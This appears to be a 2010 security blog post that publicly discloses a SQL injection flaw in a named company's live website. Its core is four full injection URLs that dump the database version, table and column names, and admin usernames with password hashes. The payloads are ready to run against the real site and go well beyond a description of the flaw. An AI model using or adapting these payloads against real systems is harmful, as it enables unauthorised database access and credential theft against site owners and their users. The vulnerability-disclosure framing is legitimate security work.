Critical SQL Injection in www.kmd.com KMD Group of Companies

Home / Hacking, News, Security / Critical SQL Injection in www.kmd.com KMD Group of Companies

August 26, 2010 PlanetCreator 0 Comments 0 tags

PlanetCreator.Net’s Security Team Member Info Freakzz <infofreakzzz(at)gmail.com> has reported another critical SQL Injection (vulnerability) on http://www.kmd.com.sg owned by KMD Group of Companies

These are some information from Vulneral Site http://www.kmd.com.sg :

his vulnerability has been alerted to :- [email protected]

@@version, user(), DB

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,5,6,7,8--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

tbl

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database%28%29--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

col

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28column_name%29,5,6,7,8%20from%20information_schema.columns%20where%20table_schema=database%28%29--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

usr & pass hash

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28adm_user_name,0x3a,adm_user_password%29,5,6,7,8%20from%20kmd_admuser--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

We hope that your security staff will look into this issue and fix it as soon as possible.

Thx – Infofreakzzz for sending security updates!

Explore More

Waledac, the Geo-Targeted Malware

Malware authors are using IP tracking methods to deliver the latest variant of malware. Itâ€™s reported that the malware Waledec sends localized news to the victims using GeoIP technologies. The

LDAP Injection Vulnerabilities

LDAP Injection Overview LDAP Injection attacks are not as common as the other types of injection attacks, but if your product uses an LDAP server this must be tested. An

Wake up Adobe; we love your Flash player but not Trojans

Virus developers are taking advantage of the enormous popularity of the Adobe flash player and creating fake Adobe Flash player which installs Trojan horse designed to steal password and personal

[webapps] CodeCanyon RISE CRM 3.7.0 - SQL Injection
on March 28, 2025 at 12:00 am
CodeCanyon RISE CRM 3.7.0 - SQL Injection
[webapps] Litespeed Cache 6.5.0.1 - Authentication Bypass
on March 28, 2025 at 12:00 am
Litespeed Cache 6.5.0.1 - Authentication Bypass
[webapps] MoziloCMS 3.0 - Remote Code Execution (RCE)
on March 27, 2025 at 12:00 am
MoziloCMS 3.0 - Remote Code Execution (RCE)
[webapps] KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)
on March 27, 2025 at 12:00 am
KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)
[webapps] X2CRM 8.5 - Stored Cross-Site Scripting (XSS)
on March 27, 2025 at 12:00 am
X2CRM 8.5 - Stored Cross-Site Scripting (XSS)